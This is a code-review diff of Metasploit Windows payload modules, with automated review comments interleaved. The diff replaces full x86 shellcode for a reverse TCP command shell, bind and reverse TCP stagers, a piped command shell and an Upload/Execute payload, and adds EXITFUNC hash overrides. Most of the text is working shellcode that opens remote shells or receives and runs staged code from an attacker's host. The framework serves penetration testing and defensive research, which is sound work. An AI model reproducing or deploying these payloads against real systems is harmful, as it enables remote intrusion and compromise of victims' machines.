"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
|
||||
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" +
|
||||
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" +
|
||||
"\x6E\x4D\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31" +
|
||||
"\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44" +
|
||||
"\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53" +
|
||||
"\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68" +
|
||||
"\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D" +
|
||||
"\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F" +
|
||||
"\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -77,5 +77,18 @@ module Metasploit3
|
|||
}
|
||||
))
|
||||
end
|
||||
|
||||
|
||||
# for now we must let this payload use the old EXITFUNC hash values.
|
||||
def replace_var(raw, name, offset, pack)
|
||||
super
|
||||
if( name == 'EXITFUNC' )
|
||||
datastore[name] = 'thread' if not datastore[name]
|
||||
raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh'
|
||||
raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread'
|
||||
raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process'
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
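Review bot: When datastore['EXITFUNC'] holds anything other than 'seh', 'thread' or 'process', none of the three assignments fire, so the bytes `super` just wrote with the new-format hash are left in this old-format payload and the method still returns true; the mismatch would only surface at runtime. A lookup with fetch makes the failure explicit and removes the duplicated literals: `old_hashes = { 'seh' => 0x5F048AF0, 'thread' => 0x60E0CEEF, 'process' => 0x73E2D87E }` and then `raw[offset, 4] = [ old_hashes.fetch(datastore[name]) ].pack(pack || 'V')`. The same override, literals included, is copied verbatim in the second replace_var hunk further down; one shared constant next to @@exit_types would keep the two copies aligned. Note also that `datastore[name] = 'thread' if not datastore[name]` writes the default back into the datastore as a side effect of generating the payload.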
|
|
@ -24,7 +24,7 @@ module Metasploit3
|
|||
'Name' => 'Windows Command Shell, Reverse TCP Inline',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Connect back to attacker and spawn a command shell',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -34,36 +34,30 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 166, 'n' ],
|
||||
'LHOST' => [ 160, 'ADDR' ],
|
||||
'EXITFUNC' => [ 278, 'V' ],
|
||||
'LPORT' => [ 203, 'n' ],
|
||||
'LHOST' => [ 196, 'ADDR' ],
|
||||
'EXITFUNC' => [ 284, 'V' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" +
|
||||
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
|
||||
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" +
|
||||
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" +
|
||||
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
|
||||
"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
|
||||
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" +
|
||||
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" +
|
||||
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" +
|
||||
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" +
|
||||
"\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" +
|
||||
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43" +
|
||||
"\x53\xff\xd0\x68\xff\xff\xff\xff\x66\x68\x11\x5c" +
|
||||
"\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff" +
|
||||
"\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" +
|
||||
"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" +
|
||||
"\xe2\x31\xc0\xf3\xaa\x95\x89\xfd\xfe\x42\x2d\xfe" +
|
||||
"\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3" +
|
||||
"\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" +
|
||||
"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" +
|
||||
"\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7" +
|
||||
"\x79\xc6\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff" +
|
||||
"\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0"
|
||||
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" +
|
||||
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89" +
|
||||
"\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24" +
|
||||
"\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46" +
|
||||
"\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E" +
|
||||
"\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A" +
|
||||
"\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05" +
|
||||
"\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -24,7 +24,7 @@ module Metasploit3
|
|||
'Name' => 'Bind TCP Stager',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Listen for a connection',
|
||||
'Author' => ['hdm', 'skape'],
|
||||
'Author' => ['hdm', 'skape', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -32,34 +32,27 @@ module Metasploit3
|
|||
'Convention' => 'sockedi',
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 276+1, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc"+
|
||||
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +
|
||||
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +
|
||||
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +
|
||||
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +
|
||||
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +
|
||||
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b\x52" +
|
||||
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31" +
|
||||
"\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81" +
|
||||
"\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68\x8e" +
|
||||
"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +
|
||||
"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" +
|
||||
"\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49\x86\x49" +
|
||||
"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" +
|
||||
"\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" +
|
||||
"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" +
|
||||
"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0" +
|
||||
"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53" +
|
||||
"\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53" +
|
||||
"\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7\xff\x55" +
|
||||
"\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff" +
|
||||
"\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18" +
|
||||
"\xff\xd3"
|
||||
'Offsets' => { 'LPORT' => [ 201, 'n' ] },
|
||||
'RequiresMidstager' => false,
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
|
||||
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" +
|
||||
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" +
|
||||
"\x6E\x4D\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F" +
|
||||
"\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58" +
|
||||
"\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56\x53\x57\x68\x02\xD9" +
|
||||
"\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
|
||||
}
|
||||
))
|
||||
end
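Review bot: `'RequiresMidstager' => false` is a new flag whose meaning is only discoverable by reading handle_intermediate_stage in the Windows payload mixin. A comment alongside it, e.g. `# The stager reads the 4-byte length prefix itself (block_recv.asm) and receives the stage into its own buffer, so no midstager may be sent`, would tie the two sides together. The reverse_tcp stager section below adds the same flag and needs the same comment.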
|
||||
|
|
|
@ -100,5 +100,18 @@ module Metasploit3
|
|||
# Return the updated payload
|
||||
return p
|
||||
end
|
||||
|
||||
|
||||
# for now we must let this payload use the old EXITFUNC hash values.
|
||||
def replace_var(raw, name, offset, pack)
|
||||
super
|
||||
if( name == 'EXITFUNC' )
|
||||
datastore[name] = 'thread' if not datastore[name]
|
||||
raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh'
|
||||
raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread'
|
||||
raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process'
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
|
@ -24,7 +24,7 @@ module Metasploit3
|
|||
'Name' => 'Reverse TCP Stager',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Connect back to the attacker',
|
||||
'Author' => ['hdm', 'skape'],
|
||||
'Author' => ['hdm', 'skape', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -32,32 +32,26 @@ module Metasploit3
|
|||
'Convention' => 'sockedi',
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ 263, 'ADDR' ],
|
||||
'LPORT' => [ 270, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45" +
|
||||
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" +
|
||||
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74" +
|
||||
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a" +
|
||||
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" +
|
||||
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b" +
|
||||
"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff" +
|
||||
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0" +
|
||||
"\x81\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68" +
|
||||
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6" +
|
||||
"\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00" +
|
||||
"\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa" +
|
||||
"\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00" +
|
||||
"\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05" +
|
||||
"\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b" +
|
||||
"\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40" +
|
||||
"\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11" +
|
||||
"\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06" +
|
||||
"\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53" +
|
||||
"\x57\xff\x55\x18\xff\xd3"
|
||||
'Offsets' => { 'LHOST' => [ 196, 'ADDR' ], 'LPORT' => [ 203, 'n' ], },
|
||||
'RequiresMidstager' => false,
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" +
|
||||
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57" +
|
||||
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00" +
|
||||
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56" +
|
||||
"\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" +
|
||||
"\xEC\xC3"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -22,7 +22,7 @@ module Metasploit3
|
|||
'Name' => 'Windows Command Shell',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Spawn a piped command shell',
|
||||
'Author' => 'spoonm',
|
||||
'Author' => [ 'spoonm', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -35,39 +35,23 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 443, 'V' ]
|
||||
'EXITFUNC' => [ 210, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00\x00"+
|
||||
"\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"+
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b\x01\xee\x31"+
|
||||
"\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54"+
|
||||
"\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c"+
|
||||
"\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc2\x08\x00\x6a\x30\x59"+
|
||||
"\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c\xad\x8b\x58\x08\x5e\x53\x68"+
|
||||
"\x8e\x4e\x0e\xec\xff\xd6\x97\x53\x56\x57\x8d\x44\x24\x10\x50\xff"+
|
||||
"\xd7\x50\x50\x50\x68\xb6\x19\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70"+
|
||||
"\xe9\xff\xd6\x95\x68\x08\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec"+
|
||||
"\x10\x89\xe5\x89\xee\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51"+
|
||||
"\x56\xad\x56\x53\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0"+
|
||||
"\x89\xe0\x6a\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68"+
|
||||
"\x43\x4d\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab"+
|
||||
"\x83\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"+
|
||||
"\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc\x54"+
|
||||
"\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72\xfe\xb3"+
|
||||
"\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4\x89\xe7\x6a"+
|
||||
"\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0\x31\xc0\x50\x57"+
|
||||
"\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07\xb4\xff\x55\x20\xff"+
|
||||
"\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74\x36\xe8\x77\x00\x00\x00"+
|
||||
"\x50\x89\xe1\x50\x51\x56\x57\xff\x75\x0c\x53\x68\x16\x65\xfa\x10"+
|
||||
"\xff\x55\x20\xff\xd0\x85\xc0\x74\x50\x31\xc0\x59\x39\xc8\x74\x11"+
|
||||
"\x50\x51\x57\xff\x75\x28\xff\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb"+
|
||||
"\xab\x89\xe0\xe8\x3f\x00\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28"+
|
||||
"\xff\x55\x14\x31\xc9\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52"+
|
||||
"\x50\x57\xff\x75\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0"+
|
||||
"\x85\xc0\x74\x05\x31\xc0\x59\xeb\xc8\x53\x68\x7e\xd8\xe2\x73\xff"+
|
||||
"\x55\x20\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75"+
|
||||
"\x28\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3"
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56" +
|
||||
"\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44" +
|
||||
"\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F" +
|
||||
"\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF" +
|
||||
"\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C" +
|
||||
"\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
end
|
||||
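Review bot: The new 'Payload' blob (lines 3952–3994) carries no provenance comment, so the `'EXITFUNC' => [ 210, 'V' ]` offset above it cannot be checked or regenerated without knowing which assembly source produced the bytes; a header such as `# Built with build.py from <single source .asm>; regenerate rather than hand-edit, offsets come from the build output` would fix that. The first nine string lines (`\xFC\xE8\x89...` through `...\x8B\x12\xEB\x86\x5D`) are byte-identical to the opening of the Upload/Execute payload below and of the bind stager above, which suggests a shared prelude; naming it in a comment would help a reader diff future changes to the three blobs. The new string also switches from the file's lower-case `\x..` escapes to upper-case ones, and the `" +` spacing differs from the old `"+` form; one convention per file is easier to scan.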
|
|
|
@ -22,7 +22,7 @@ module Metasploit3
|
|||
'Name' => 'Windows Upload/Execute',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Uploads an executable and runs it',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => ['vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -31,34 +31,33 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 385, 'V' ]
|
||||
'EXITFUNC' => [ 368, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\x81\xec\x40\x00\x00\x00\xfc\x89\xfb\xe8\x48\x00\x00\x00\x60\x8b" +
|
||||
